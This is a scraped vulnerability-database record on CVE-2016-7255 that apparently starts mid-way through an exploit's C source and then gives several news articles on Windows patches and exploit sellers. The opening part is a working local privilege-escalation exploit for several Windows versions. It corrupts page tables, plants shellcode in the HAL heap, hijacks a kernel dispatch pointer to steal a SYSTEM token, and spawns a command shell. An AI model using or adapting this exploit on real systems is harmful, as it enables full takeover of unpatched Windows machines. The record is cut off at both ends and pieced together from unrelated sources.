PxE\r\n pde_pfn = pde_pfn | 0x67; // Set U/S\r\n printf(\"[+] Patching the Spurious Offset (PDE) %llx: %llx\\n\", spurious_offset, pde_pfn);\r\n *((PVOID *)spurious_offset) = (PVOID)pde_pfn;\r\n Sleep(0x1); // Sleep for TLB refresh;\r\n \r\n //Read the physical address of pte\r\n UINT64 pte_addr = spurious_pt + pte_offset;\r\n UINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset);\r\n printf(\"[+] Content pte %llx: %llx\\n\", pte, pte_pfn);\r\n // Change the PxE\r\n pte_pfn = pte_pfn | 0x67; // Set U/S\r\n pte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX \r\n if (patch_original) {\r\n printf(\"*** Patching the original location to enable NX...\\n\");\r\n *(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn;\r\n }\r\n \r\n printf(\"[+] Patching the Spurious Offset (PTE) %llx: %llx\\n\", spurious_offset, pte_pfn);\r\n *((PVOID *)spurious_offset) = (PVOID)pte_pfn;\r\n Sleep(0x1); // Sleep for TLB refresh;\r\n printf(\"\\n\\n\");\r\n return spurious_pt;\r\n}\r\n \r\nUINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) {\r\n printf(\"[*] Getting Overwrite pointer: %llx\\n\", target_address);\r\n UINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE);\r\n OverwriteAddress += (target_address & 0xFFF);\r\n printf(\"OverwriteAddress: %llx\\n\", OverwriteAddress);\r\n return (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset));\r\n}\r\n \r\nvoid overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) {\r\n UINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE);\r\n OverwriteTarget += (target_address & 0xFFF);\r\n UINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset;\r\n printf(\"Patch OverwriteTarget: %llx with %llx\\n\", target, hook_address);\r\n *(PVOID *)target = (PVOID)hook_address;\r\n}\r\n \r\n \r\nUINT64 store_shellcode_in_hal(void) {\r\n //// Finally store the shellcode on the HAL\r\n \r\n UINT64 hal_heap_addr = 0xFFFFFFFFFFD00000;\r\n UINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE);\r\n \r\n printf(\"HAL address: %llx\\n\", hal_heap);\r\n // 0xffffffffffd00d50 this is a good offset to store shellcode \r\n // 0xfff - 0xd50 = 0x2af space\r\n \r\n memcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode));\r\n return 0xffffffffffd00d50;\r\n}\r\n \r\nUINT64 GetHalDispatchTable() {\r\n PCHAR KernelImage;\r\n SIZE_T ReturnLength;\r\n HMODULE hNtDll = NULL;\r\n UINT64 HalDispatchTable;\r\n HMODULE hKernelInUserMode = NULL;\r\n PVOID KernelBaseAddressInKernelMode;\r\n NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;\r\n PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;\r\n \r\n hNtDll = LoadLibrary(\"ntdll.dll\");\r\n \r\n if (!hNtDll) {\r\n printf(\"\\t\\t\\t[-] Failed To Load NtDll.dll: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, \"NtQuerySystemInformation\");\r\n \r\n if (!NtQuerySystemInformation) {\r\n printf(\"\\t\\t\\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength);\r\n \r\n // Allocate the Heap chunk\r\n pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),\r\n HEAP_ZERO_MEMORY,\r\n ReturnLength);\r\n \r\n if (!pSystemModuleInformation) {\r\n printf(\"\\t\\t\\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n NtStatus = NtQuerySystemInformation(SystemModuleInformation,\r\n pSystemModuleInformation,\r\n ReturnLength,\r\n &ReturnLength);\r\n \r\n if (NtStatus != STATUS_SUCCESS) {\r\n printf(\"\\t\\t\\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base;\r\n KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\\\') + 1;\r\n \r\n printf(\"\\t\\t\\t[+] Loaded Kernel: %s\\n\", KernelImage);\r\n printf(\"\\t\\t\\t[+] Kernel Base Address: 0x%p\\n\", KernelBaseAddressInKernelMode);\r\n \r\n hKernelInUserMode = LoadLibraryA(KernelImage);\r\n \r\n if (!hKernelInUserMode) {\r\n printf(\"\\t\\t\\t[-] Failed To Load Kernel: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n // This is still in user mode\r\n HalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, \"HalDispatchTable\");\r\n \r\n if (!HalDispatchTable) {\r\n printf(\"\\t\\t\\t[-] Failed Resolving HalDispatchTable: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n else {\r\n HalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode;\r\n \r\n // Here we get the address of HapDispatchTable in Kernel mode\r\n HalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode);\r\n printf(\"\\t\\t\\t[+] HalDispatchTable: 0x%llx\\n\", HalDispatchTable);\r\n }\r\n \r\n HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation);\r\n \r\n if (hNtDll) {\r\n FreeLibrary(hNtDll);\r\n }\r\n \r\n if (hKernelInUserMode) {\r\n FreeLibrary(hKernelInUserMode);\r\n }\r\n \r\n hNtDll = NULL;\r\n hKernelInUserMode = NULL;\r\n pSystemModuleInformation = NULL;\r\n \r\n return HalDispatchTable;\r\n}\r\n \r\nint __cdecl main(int argc, char** argv)\r\n{\r\n TCHAR pre_username[256];\r\n TCHAR post_username[256];\r\n DWORD size = 256;\r\n ULONG Interval = 0;\r\n HMODULE hNtDll = NULL;\r\n UINT retval;\r\n UINT64 overwrite_address;\r\n int overwrite_offset;\r\n \r\n // define operating system version specific variables\r\n unsigned char sc_KPROCESS;\r\n unsigned int sc_TOKEN;\r\n unsigned int sc_APLINKS;\r\n int osversion;\r\n \r\n if (argc != 2) {\r\n printf(\"Please enter an OS version\\n\");\r\n printf(\"The following OS'es are supported:\\n\");\r\n printf(\"\\t[*] 7 - Windows 7\\n\");\r\n printf(\"\\t[*] 81 - Windows 8.1\\n\");\r\n printf(\"\\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\\n\");\r\n printf(\"\\t[*] 12 - Windows 2012 R2\\n\");\r\n printf(\"\\n\");\r\n printf(\"\\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\\n\");\r\n return -1;\r\n }\r\n \r\n osversion = _strtoui64(argv[1], NULL, 10);\r\n \r\n if(osversion == 7) \r\n {\r\n // the target machine's OS is Windows 7 SP1\r\n printf(\" [+] Windows 7 SP1\\n\");\r\n sc_KPROCESS = 0x70; // dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x80; // dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80)\r\n sc_APLINKS = 0x188; // dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = GetHalDispatchTable(); // HalDispatchTable\r\n overwrite_offset = 0x8; // QueryIntervalProfile \r\n }\r\n else if(osversion == 81)\r\n {\r\n // the target machine's OS is Windows 8.1\r\n printf(\" [+] Windows 8.1\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController))\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n else if(osversion == 10)\r\n {\r\n // the target machine's OS is Windows 10 prior to build 14393\r\n printf(\" [+] Windows 10\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n else if(osversion == 12)\r\n {\r\n // the target machine's OS is Windows 2012 R2\r\n printf(\" [+] Windows 2012 R2\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n // in case the OS version is not any of the previously checked versions\r\n else\r\n {\r\n printf(\" [-] Unsupported version\\n\");\r\n printf(\" [*] Affected 64-bit operating systems\\n\");\r\n printf(\" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\\n\");\r\n printf(\" [*] Windows 8.1 -- cve-2016-7255.exe 81\\n\");\r\n printf(\" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\\n\");\r\n printf(\" [*] Windows 2012 R2 -- cve-2016-7255.exe 12\\n\");\r\n return -1;\r\n }\r\n \r\n printf(\"My PID is: %d\\n\", GetCurrentProcessId());\r\n GetUserName(pre_username, &size);\r\n printf(\"Current Username: %s\\n\", pre_username);\r\n printf(\"PML4 Self Ref: %llx\\n\", PML4_SELF_REF);\r\n printf(\"Shellcode stored at: %p\\n\", (void *) &shellcode);\r\n printf(\"Enter to continue...\\n\");\r\n getchar();\r\n \r\n do\r\n {\r\n or_address_value_4((void*)PML4_SELF_REF);\r\n } while (FALSE);\r\n \r\n PML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF);\r\n printf(\"[*] Self Ref Index: %x\\n\", PML4_SELF_REF_INDEX);\r\n PML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000);\r\n \r\n UINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset);\r\n \r\n printf(\"Original OverwriteTarget pointer: %llx\\n\", original_pointer);\r\n DWORD pid = GetCurrentProcessId();\r\n \r\n /* Shellcode Patching !! */\r\n char *p = shellcode;\r\n p += 4; // skip the CLI, PUSHF and MOV RAX bytes \r\n *(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1\r\n \r\n p += 12; // Patch shellcode with original value in the Overwrite address\r\n *(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset);\r\n \r\n p += 12; // To patch the PID of our process\r\n \r\n *(DWORD *)p = (DWORD)pid;\r\n \r\n p += 17;\r\n *(unsigned char *)p = (unsigned char)sc_KPROCESS;\r\n \r\n p += 7;\r\n *(unsigned int *)p = (unsigned int)sc_APLINKS;\r\n \r\n p += 20;\r\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\r\n \r\n p += 20;\r\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\r\n \r\n UINT64 shellcode_va = store_shellcode_in_hal();\r\n printf(\"[+] w00t: Shellcode stored at: %llx\\n\", shellcode_va);\r\n overwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset);\r\n \r\n if (osversion == 7){\r\n // Exploit Win7.1\r\n hNtDll = LoadLibrary(\"ntdll.dll\");\r\n \r\n if (!hNtDll) {\r\n printf(\"\\t\\t[-] Failed loading NtDll: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, \"NtQueryIntervalProfile\");\r\n \r\n if (!NtQueryIntervalProfile) {\r\n printf(\"\\t\\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n } \r\n NtQueryIntervalProfile(0x1337, &Interval);\r\n }\r\n \r\n \r\n while (1) {\r\n size = 256;\r\n GetUserName(post_username, &size);\r\n if (memcmp(post_username, pre_username, 256) != 0) break;\r\n }\r\n Sleep(2000);\r\n system(\"cmd.exe\");\r\n \r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/26645"}], "thn": [{"lastseen": "2018-01-27T09:18:01", "bulletinFamily": "info", "cvelist": ["CVE-2016-7255"], "description": "[](<https://1.bp.blogspot.com/-YHGy8IvdU5A/WCNWb0AOdHI/AAAAAAAAqLQ/ZFC2_5FuLBsj06QydsVi5k6oMzvGFz5vACLcB/s1600/microsoft-security-update.png>)\n\nMicrosoft was very upset with Google last week when its Threat Analysis Group publically disclosed a critical [Windows kernel vulnerability](<https://thehackernews.com/2016/10/google-windows-zero-day.html>) (CVE-2016-7255) that had yet to be patched. \n \nThe company [criticized Google's move](<https://thehackernews.com/2016/11/windows-zeroday-exploit.html>), claiming that the disclosure of the vulnerability, which was being exploited in the wild, put its customers \"at potential risk.\" \n \nThe vulnerability affects all Windows versions from Windows Vista through current versions of Windows 10, and Microsoft was set to issue a fix come this month's Patch Tuesday. \n \nSo, as part of its monthly Patch Tuesday, Microsoft today patched the security flaw in Windows that was actively being exploited by hackers. \n \nAccording to Microsoft's [security bulletin](<https://technet.microsoft.com/library/security/MS16-135>) released today, any hacker who tricked victims into running a \"specially-crafted application\" could successfully exploit the system bug and gain the ability to \"install programs; view, change, or delete data; or create new accounts with full user rights.\" \n \nOnce exploited, the bug could be used to escape the sandbox protection and execute malicious code on the compromised Windows machine. \n \nRated as \"important,\" the vulnerability was being exploited by Strontium group, also known as Fancy Bear, Sofacy, and APT 28, in targeted attacks. \n \n[Fancy Bear](<https://thehackernews.com/2016/11/windows-zeroday-exploit.html>) is the same group of hackers that has also been accused by the US Intelligence community of hacking the [Democratic National Committee](<https://thehackernews.com/2016/07/russia-dnc-email-hack.html>), Clinton Campaign Chair [John Podesta](<https://thehackernews.com/2016/10/wikileaks-clinton-leak.html>), and former Secretary of State Colin Powell, among others. \n \nBesides this controversial flaw exposed by Google last week, the security bulletin also fixes multiple elevation of privilege bugs. \n \nPatch Tuesday also contains several critical security patches that affect all versions of Windows as well as other important updates and fixes for both Internet Explorer and Edge. \n \nSo, I strongly recommend home users and companies to ensure that their Windows PC is up-to-date with all of Microsoft's latest security fixes as of today.\n", "modified": "2016-11-09T17:12:11", "published": "2016-11-09T06:12:00", "id": "THN:F8BDC767F3D202913920E1C28D137377", "href": "https://thehackernews.com/2016/11/microsoft-windows-update.html", "type": "thn", "title": "Microsoft Patches Windows Zero-Day Flaw Disclosed by Google", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-02T11:44:40", "bulletinFamily": "info", "cvelist": ["CVE-2016-7255", "CVE-2019-0859"], "description": "[](<https://thehackernews.com/images/-VgCR2Fih8qA/X3bKP0yAofI/AAAAAAAA3Xk/2BjzswcnClsJubOJnK-h72WdkV--wVjvwCLcBGAsYHQ/s0/exploit-development.jpg>)\n\nWriting advanced malware for a threat actor requires different groups of people with diverse technical expertise to put them all together. But can the code leave enough clues to reveal the person behind it?\n\nTo this effect, cybersecurity researchers on Friday detailed a new methodology to identify exploit authors that use their unique characteristics as a fingerprint to track down other exploits developed by them.\n\nBy deploying this technique, the researchers were able to link 16 Windows local privilege escalation (LPE) exploits to two zero-day sellers \"Volodya\" (previously called \"BuggiCorp\") and \"PlayBit\" (or \"luxor2008\").\n\n\"Instead of focusing on an entire malware and hunting for new samples of the malware family or actor, we wanted to offer another perspective and decided to concentrate on these few functions that were written by an exploit developer,\" Check Point Research's [Itay Cohen and Eyal Itkin](<https://research.checkpoint.com/2020/graphology-of-an-exploit-volodya/>) noted.\n\n## Fingerprinting an Exploit Writer's Characteristics\n\nThe idea, in a nutshell, is to fingerprint an exploit for specific artifacts that can uniquely tie it to a developer. It could be in using hard-coded values, string names, or even how the code is organized and certain functions are implemented.\n\nCheck Point said their analysis began in response to a \"complicated attack\" against one of its customers when they encountered a 64-bit malware executable that exploited [CVE-2019-0859](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0859>) to gain elevated privileges.\n\nNoticing the fact that the exploit and the malware were written by two different sets of people, the researchers used the binary's properties as a unique hunting signature to find at least 11 other exploits developed by the same developer named \"Volodya\" (or \"Volodimir\").\n\n[](<https://thehackernews.com/images/-8XQpJ6aaOXE/X3bJepUcWVI/AAAAAAAA3Xc/RKyut5eDU-EfRXvFOJBCku7GCiTWNXJwgCLcBGAsYHQ/s0/malware-1.jpg>)\n\n\"Finding a vulnerability, and reliably exploiting it, will most probably be done by specific teams or individuals who specialize in a particular role. The malware developers for their part don't really care how it works behind the scenes, they just want to integrate this [exploits] module and be done with it,\" the researchers said.\n\nInterestingly, Volodya \u2014 likely of Ukrainian origin \u2014 has been [previously linked](<https://www.zdnet.com/article/mysterious-hacker-has-been-selling-windows-0-days-to-apt-groups-for-three-years/>) to selling Windows zero-days to cyberespionage groups and crimeware gangs for anywhere between $85,000 to $200,000.\n\nChief among them was an LPE exploit that leveraged a memory corruption in \"[NtUserSetWindowLongPtr](<https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowlongptra>)\" (CVE-2016-7255), which has been widely used by ransomware operators like GandCrab, Cerber, and [Magniber](<https://securelist.com/magnitude-exploit-kit-evolution/97436/>). It's now believed that Volodya [advertised this LPE zero-day](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/zero-day-auction-for-the-masses/>) on the Exploit.in cybercrime forum in May 2016.\n\nIn all, five zero-day and six one-day exploits were identified as developed by Volodya over a period of 2015-2019. Subsequently, the same technique was employed to identify five more LPE exploits from another exploit writer known as PlayBit.\n\n## An Extensive Clientele\n\nStating the exploit samples shared code level similarities to grant SYSTEM privileges to the desired process, the researchers said, \"both of our actors were very consistent in their respective exploitation routines, each sticking to their favorite way.\"\n\nWhat's more, Volodya also appears to have switched up his tactics during the intervening years, with the developer shifting from selling the exploits as embeddable source code in the malware to an external utility that accepts a specific API.\n\nBesides ransomware groups, Volodya has been found to cater to an extensive clientele, including the Ursnif banking trojan, and APT groups such as Turla, APT28, and Buhtrap.\n\n[](<https://thehackernews.com/images/-MNtIN_O8MUA/X3bJJ7ypHuI/AAAAAAAA3XU/cceh7GbuWRUA-YVEd84SYiMoxzAoPtLbwCLcBGAsYHQ/s0/malware.jpg>)\n\n\"The APT customers, Turla, APT28, and Buhtrap, are all commonly attributed to Russia and it is interesting to find that even these advanced groups purchase exploits instead of developing them in-house,\" Check Point observed in its analysis. \"This is another point which further strengthens our hypothesis that the written exploits can be treated as a separate and distinct part of the malware.\"\n\nWith cyberattacks expanding in scope, frequency, and magnitude, using an exploit developer's code signature as a means to track down bad actors could provide valuable insight into the black exploit market.\n\n\"When Check Point finds a vulnerability, we demonstrate its severity, report it to the appropriate vendor, and make sure it's patched, so it doesn't pose a threat,\" Cohen said. \"However, for individuals trading these exploits, it's a completely different story. For them, finding the vulnerability is just the beginning. They need to reliably exploit it on as many versions as possible, in order to monetize it to a customer's satisfaction.\"\n\n\"This research provides insight into how that is achieved, and the buyers in this market, which often include nation-state actors. We believe that this research methodology can be used to identify additional exploit writers.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2020-10-02T10:18:28", "published": "2020-10-02T09:59:00", "id": "THN:89E2A7A39CBD630AB15218875ED90D19", "href": "https://thehackernews.com/2020/10/exploit-development.html", "type": "thn", "title": "Researchers Fingerprint Exploit Developers Who Help Several Malware Authors", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-15T06:27:48", "bulletinFamily": "info", "cvelist": ["CVE-2021-1732", "CVE-2021-27091", "CVE-2021-28310", "CVE-2021-28312", "CVE-2021-28437", "CVE-2021-28444", "CVE-2021-28458", "CVE-2021-28480", "CVE-2021-28483"], "description": "[](<https://thehackernews.com/images/-YROWoUQuY8Q/YHZ1yLhkJGI/AAAAAAAACQw/rmFTIz73mk81DI0P2vG2MpkxtMrT5jqbgCLcBGAsYHQ/s0/windows-update-smb-flaw.jpg>)\n\nIn its April slate of patches, Microsoft rolled out fixes for a total of [114 security flaws](<https://msrc-blog.microsoft.com/2021/04/13/april-2021-update-tuesday-packages-now-available/>), including an actively exploited zero-day and four remote code execution bugs in Exchange Server.\n\nOf the [114 flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Apr>), 19 are rated as Critical, 88 are rated Important, and one is rated Moderate in severity.\n\nChief among them is [CVE-2021-28310](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28310>), a privilege escalation vulnerability in Win32k that's said to be under active exploitation, allowing attackers to elevate privileges by running malicious code on a target system. \n\nCybersecurity firm Kaspersky, which discovered and reported the flaw to Microsoft in February, linked the zero-day exploit to a threat actor named Bitter APT, which was found exploiting a similar flaw ([CVE-2021-1732](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>)) in attacks late last year.\n\n[](<https://go.thn.li/1-300-4> \"password auditor\" )\n\n\"It is an escalation of privilege (EoP) exploit that is likely used together with other browser exploits to escape sandboxes or get system privileges for further access,\" Kaspersky researcher Boris Larin [said](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>).\n\n## NSA Found New Bugs Affecting Exchange Server\n\nAlso fixed by Microsoft are four remote code execution (RCE) flaws (CVE-2021-28480 through CVE-2021-28483) affecting [on-premises Exchange Servers](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-april-2021-exchange-server-security-updates/ba-p/2254617>) 2013, 2016, and 2019 that were reported to the company by the U.S. National Security Agency (NSA). Two of the code execution bugs are unauthenticated and require no user interaction, and carry a CVSS score of 9.8 out of a maximum of 10.\n\n[](<https://thehackernews.com/images/-8FoY65fokvw/YHZ2L3VP2bI/AAAAAAAACQ4/krAsXabe1VgmdxN0j2h4MtXElmsH8ApJACLcBGAsYHQ/s0/microsoft-exchnage.jpg>)\n\nWhile the Windows maker said it had found no evidence of any active exploits in the wild, it's recommended that customers install these updates as soon as possible to secure the environment, particularly in light of the widespread Exchange Server hacks last month and new findings that attackers are attempting to leverage the [ProxyLogon](<https://thehackernews.com/2021/03/proxylogon-exchange-poc-exploit.html>) exploit to [deploy malicious cryptominers](<https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/>) onto Exchange Servers, with the payload being hosted on a compromised Exchange Server.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also [revised](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/13/apply-microsoft-april-2021-security-update-mitigate-newly>) the emergency directive it issued last month, stating \"these vulnerabilities pose an unacceptable risk to the Federal enterprise and require an immediate and emergency action,\" while cautioning that the underlying flaws can be weaponized by reverse-engineering the patch to create an exploit.\n\nCybersecurity firm Check Point, which has been tracking ongoing cyber threats exploiting the Exchange Server flaws, said a total of 110,407 attacks have been prevented targeting government, manufacturing, finance, healthcare, legal, and insurance industries in the U.S., U.K., Germany, Netherlands, and Brazil.\n\n## FBI Removed Backdoors From Hacked MS Exchange servers\n\nWhat's more, the U.S. Federal Bureau of Investigation (FBI) carried out a \"successful action\" to \"copy and remove\" web shells planted by adversaries on hundreds of victim computers using the ProxyLogon flaws. The FBI is said to have wiped the web shells that were installed by Hafnium that could have been used to maintain and escalate persistent, unauthorized access to U.S. networks.\n\n[](<https://go.thn.li/2-728-4> \"password auditor\" )\n\n\"The FBI conducted the removal by issuing a command through the web shell to the server, which was designed to cause the server to delete only the web shell (identified by its unique file path),\" the Justice Department [said](<https://www.justice.gov/usao-sdtx/pr/justice-department-announces-court-authorized-effort-disrupt-exploitation-microsoft>) in a statement detailing the court-authorized operation.\n\n## 27 RCE Flaws in Windows RPC and Other Fixes\n\nMicrosoft also said four additional vulnerabilities were publicly known at the time of release but not exploited \u2014\n\n * CVE-2021-28458 - Azure ms-rest-nodeauth Library Elevation of Privilege Vulnerability\n * CVE-2021-27091 - RPC Endpoint Mapper Service Elevation of Privilege Vulnerability\n * CVE-2021-28437 - Windows Installer Information Disclosure Vulnerability\n * CVE-2021-28312 - Windows NTFS Denial of Service Vulnerability\n\nIn addition, April's Patch Tuesday update also addresses a whopping 27 RCE flaws in Remote Procedure Call (RPC) runtime, a Hyper-V security feature bypass vulnerability (CVE-2021-28444), and multiple privilege escalation flaws in Windows Speech Runtime, Windows Services and Controller App, Windows Secure Kernel Mode, Windows Event Tracing, and Windows Installer.\n\n## Software Patches From Other Vendors\n\nBesides Microsoft, a number of other vendors have also released a slew of patches on Tuesday \u2014\n\n * [Adobe](<https://helpx.adobe.com/security.html>) (security updates for Photoshop, Digital Editions, RoboHelp, and Bridge)\n * [DELL](<https://www.dell.com/support/security/en-in>)\n * Linux distributions [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-April/date.html>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), and [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=573801649>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>), and\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-04-15T05:57:31", "published": "2021-04-14T04:58:00", "id": "THN:F163C7AB35BEF8E28924E14B02752181", "href": "https://thehackernews.com/2021/04/nsa-discovers-new-vulnerabilities.html", "type": "thn", "title": "NSA Discovers New Vulnerabilities Affecting Microsoft Exchange Servers", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-15T13:26:26", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472", "CVE-2021-1722", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-24074", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24081", "CVE-2021-24086", "CVE-2021-24094", "CVE-2021-24100", "CVE-2021-24114", "CVE-2021-26701"], "description": "[](<https://thehackernews.com/images/-pOCXw5Vbz4E/YCNjQpEwYHI/AAAAAAAABuA/DON2kef7nngGbrXuKE_q5XlYxFXBjgnbQCLcBGAsYHQ/s0/microsoft-windows-update.jpg>)\n\nMicrosoft on Tuesday [issued fixes for 56 flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Feb>), including a critical vulnerability that's known to be actively exploited in the wild.\n\nIn all, 11 are listed as Critical, 43 are listed as Important, and two are listed as Moderate in severity \u2014 six of which are previously disclosed vulnerabilities.\n\nThe updates cover .NET Framework, Azure IoT, Microsoft Dynamics, Microsoft Edge for Android, Microsoft Exchange Server, Microsoft Office, Microsoft Windows Codecs Library, Skype for Business, Visual Studio, Windows Defender, and other core components such as Kernel, TCP/IP, Print Spooler, and Remote Procedure Call (RPC).\n\n### A Windows Win32k Privilege Escalation Vulnerability\n\nThe most critical of the flaws is a Windows Win32k privilege escalation vulnerability (CVE-2021-1732, CVSS score 7.8) that allows attackers with access to a target system to run malicious code with elevated permissions. Microsoft credited JinQuan, MaDongZe, TuXiaoYi, and LiHao of DBAPPSecurity for discovering and reporting the vulnerability.\n\n[](<https://go.thn.li/password-auditor> 